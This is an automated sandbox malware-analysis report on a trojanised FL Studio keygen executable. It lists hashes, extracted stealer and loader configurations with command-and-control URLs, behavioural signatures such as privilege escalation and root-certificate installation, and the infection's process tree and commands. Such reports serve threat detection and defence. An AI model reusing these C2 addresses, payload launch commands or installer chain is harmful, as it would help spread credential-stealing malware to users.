Analysis
-
max time kernel
67s -
max time network
303s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-04-2021 18:22
Static task
static1
Behavioral task
behavioral1
Sample
Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe
Resource
win10v20201028
General
-
Target
Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe
-
Size
5.2MB
-
MD5
c9d0760f5504d9e8ce237543fc4e7562
-
SHA1
12dac9b23d9f95b9647767e15a265a73380ad50b
-
SHA256
2519f6e84956fd35aaf7aa0ac51c2ce4cd8fddc973933936560ddb1efff6a16f
-
SHA512
28e06d8763858601484ec3675b5d0895712b616d69b36d4c584f32dfb56dfe9a7c26ad05dfda27efc2e9512c11d7dedcafd4d69d98baffdda8eb5af9ba99398a
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Extracted
raccoon
9420f36ff86e78bbb8ce4073fa910f921ce2bebf
-
url4cnc
https://tttttt.me/hobamantfr1
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5260-215-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5260-216-0x0000000002580000-0x0000000002E8A000-memory.dmp family_glupteba behavioral2/memory/5260-218-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/4944-144-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4944-145-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/4944-148-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4944-151-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 1072 keygen-pr.exe 3156 keygen-step-1.exe 2132 keygen-step-3.exe 3912 keygen-step-4.exe 2020 key.exe 3304 Setup.exe 432 multitimer.exe 1372 setups.exe 188 askinstall20.exe 1276 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 1276 setups.tmp 1276 setups.tmp 1276 setups.tmp 1276 setups.tmp 1276 setups.tmp 1276 setups.tmp 1276 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 186 ip-api.com 286 ipinfo.io 290 ipinfo.io 147 ipinfo.io 150 ipinfo.io -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
pid pid_target Process procid_target 6024 4816 WerFault.exe 116 5156 696 WerFault.exe 156 7396 696 WerFault.exe 156 6712 696 WerFault.exe 156 6860 696 WerFault.exe 156 6364 696 WerFault.exe 156 7444 696 WerFault.exe 156 4296 696 WerFault.exe 156 5472 696 WerFault.exe 156 212 696 WerFault.exe 156 7312 696 WerFault.exe 156 6788 696 WerFault.exe 156 4644 696 WerFault.exe 156 4424 696 WerFault.exe 156 -
Delays execution with timeout.exe 1 IoCs
pid Process 5384 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 2688 taskkill.exe 4696 taskkill.exe 6784 taskkill.exe 6928 taskkill.exe -
Modifies registry class 48 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4040 PING.EXE 4704 PING.EXE 5448 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 149 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 156 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 289 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 294 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1276 setups.tmp 1276 setups.tmp -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 3304 Setup.exe Token: SeCreateTokenPrivilege 188 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 188 askinstall20.exe Token: SeLockMemoryPrivilege 188 askinstall20.exe Token: SeIncreaseQuotaPrivilege 188 askinstall20.exe Token: SeMachineAccountPrivilege 188 askinstall20.exe Token: SeTcbPrivilege 188 askinstall20.exe Token: SeSecurityPrivilege 188 askinstall20.exe Token: SeTakeOwnershipPrivilege 188 askinstall20.exe Token: SeLoadDriverPrivilege 188 askinstall20.exe Token: SeSystemProfilePrivilege 188 askinstall20.exe Token: SeSystemtimePrivilege 188 askinstall20.exe Token: SeProfSingleProcessPrivilege 188 askinstall20.exe Token: SeIncBasePriorityPrivilege 188 askinstall20.exe Token: SeCreatePagefilePrivilege 188 askinstall20.exe Token: SeCreatePermanentPrivilege 188 askinstall20.exe Token: SeBackupPrivilege 188 askinstall20.exe Token: SeRestorePrivilege 188 askinstall20.exe Token: SeShutdownPrivilege 188 askinstall20.exe Token: SeDebugPrivilege 188 askinstall20.exe Token: SeAuditPrivilege 188 askinstall20.exe Token: SeSystemEnvironmentPrivilege 188 askinstall20.exe Token: SeChangeNotifyPrivilege 188 askinstall20.exe Token: SeRemoteShutdownPrivilege 188 askinstall20.exe Token: SeUndockPrivilege 188 askinstall20.exe Token: SeSyncAgentPrivilege 188 askinstall20.exe Token: SeEnableDelegationPrivilege 188 askinstall20.exe Token: SeManageVolumePrivilege 188 askinstall20.exe Token: SeImpersonatePrivilege 188 askinstall20.exe Token: SeCreateGlobalPrivilege 188 askinstall20.exe Token: 31 188 askinstall20.exe Token: 32 188 askinstall20.exe Token: 33 188 askinstall20.exe Token: 34 188 askinstall20.exe Token: 35 188 askinstall20.exe Token: SeDebugPrivilege 432 multitimer.exe Token: SeDebugPrivilege 2688 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 1372 setups.exe 1276 setups.tmp 4032 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 988 wrote to memory of 3596 988 Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe 78 PID 988 wrote to memory of 3596 988 Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe 78 PID 988 wrote to memory of 3596 988 Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe 78 PID 3596 wrote to memory of 1072 3596 cmd.exe 81 PID 3596 wrote to memory of 1072 3596 cmd.exe 81 PID 3596 wrote to memory of 1072 3596 cmd.exe 81 PID 3596 wrote to memory of 3156 3596 cmd.exe 82 PID 3596 wrote to memory of 3156 3596 cmd.exe 82 PID 3596 wrote to memory of 3156 3596 cmd.exe 82 PID 3596 wrote to memory of 2132 3596 cmd.exe 83 PID 3596 wrote to memory of 2132 3596 cmd.exe 83 PID 3596 wrote to memory of 2132 3596 cmd.exe 83 PID 3596 wrote to memory of 3912 3596 cmd.exe 84 PID 3596 wrote to memory of 3912 3596 cmd.exe 84 PID 3596 wrote to memory of 3912 3596 cmd.exe 84 PID 1072 wrote to memory of 2020 1072 keygen-pr.exe 85 PID 1072 wrote to memory of 2020 1072 keygen-pr.exe 85 PID 1072 wrote to memory of 2020 1072 keygen-pr.exe 85 PID 3912 wrote to memory of 3304 3912 keygen-step-4.exe 86 PID 3912 wrote to memory of 3304 3912 keygen-step-4.exe 86 PID 2132 wrote to memory of 3076 2132 keygen-step-3.exe 87 PID 2132 wrote to memory of 3076 2132 keygen-step-3.exe 87 PID 2132 wrote to memory of 3076 2132 keygen-step-3.exe 87 PID 3076 wrote to memory of 4040 3076 cmd.exe 89 PID 3076 wrote to memory of 4040 3076 cmd.exe 89 PID 3076 wrote to memory of 4040 3076 cmd.exe 89 PID 2020 wrote to memory of 3940 2020 key.exe 90 PID 2020 wrote to memory of 3940 2020 key.exe 90 PID 2020 wrote to memory of 3940 2020 key.exe 90 PID 3304 wrote to memory of 432 3304 Setup.exe 91 PID 3304 wrote to memory of 432 3304 Setup.exe 91 PID 3304 wrote to memory of 1372 3304 Setup.exe 92 PID 3304 wrote to memory of 1372 3304 Setup.exe 92 PID 3304 wrote to memory of 1372 3304 Setup.exe 92 PID 3912 wrote to memory of 188 3912 keygen-step-4.exe 93 PID 3912 wrote to memory of 188 3912 keygen-step-4.exe 93 PID 3912 wrote to memory of 188 3912 keygen-step-4.exe 93 PID 1372 wrote to memory of 1276 1372 setups.exe 94 PID 1372 wrote to memory of 1276 1372 setups.exe 94 PID 1372 wrote to memory of 1276 1372 setups.exe 94 PID 188 wrote to memory of 1016 188 askinstall20.exe 96 PID 188 wrote to memory of 1016 188 askinstall20.exe 96 PID 188 wrote to memory of 1016 188 askinstall20.exe 96 PID 1016 wrote to memory of 2688 1016 cmd.exe 99 PID 1016 wrote to memory of 2688 1016 cmd.exe 99 PID 1016 wrote to memory of 2688 1016 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe"C:\Users\Admin\AppData\Local\Temp\Demian007.Image.Line.Fl.Studio.key.code.generator.by.DBC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3156
-
-
